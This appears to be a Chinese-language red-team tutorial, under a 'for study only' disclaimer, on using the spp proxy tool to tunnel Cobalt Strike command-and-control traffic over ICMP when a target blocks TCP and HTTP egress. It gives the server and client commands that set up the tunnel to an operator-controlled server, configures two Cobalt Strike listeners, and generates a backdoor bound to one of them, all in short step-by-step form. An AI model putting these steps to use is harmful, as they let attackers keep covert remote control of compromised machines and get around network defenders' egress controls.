免责声明:本文仅做技术交流与学习...
目录
spp项目:
一图通解:
1-下载spp
2-服务端执行命令
3-客户端执行命令
4-服务端cs监听&生马
spp项目:
GitHub - esrrhs/spp: A simple and powerful proxy
支持的协议:tcp、udp、udp、icmp、http、kcp、quic
支持的类型:正向代理、反向代理、3ocks5正向代理、3ocks5反向代理
在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。--这里演示其隧道技术.(解决协议被封杀的问题)
一图通解:
1-下载spp
GitHub - esrrhs/spp: A simple and powerful proxy
服务端下载Linux版.
客户端下载windows版.
(这个项目对虚拟机可能是不大支持,不要放到虚拟机上.)
2-服务端执行命令
./spp -type server -proto ricmp -listen 0.0.0.0
3-客户端执行命令
spp -name "test" -type proxy_client -server <IP> -fromaddr :8086 -toaddr :8087 -proxyproto tcp -proto ricmp
--与服务端建立连接.
将本地的8086给到服务端的8087上.
(TCP封装icmp)
4-服务端cs监听&生马
监听器1: spp1 服务端IP 8087
监听器2: spp2 127.0.0.1 8086
生成后门(绑定监听器2)
--最后上线的是监听器1的.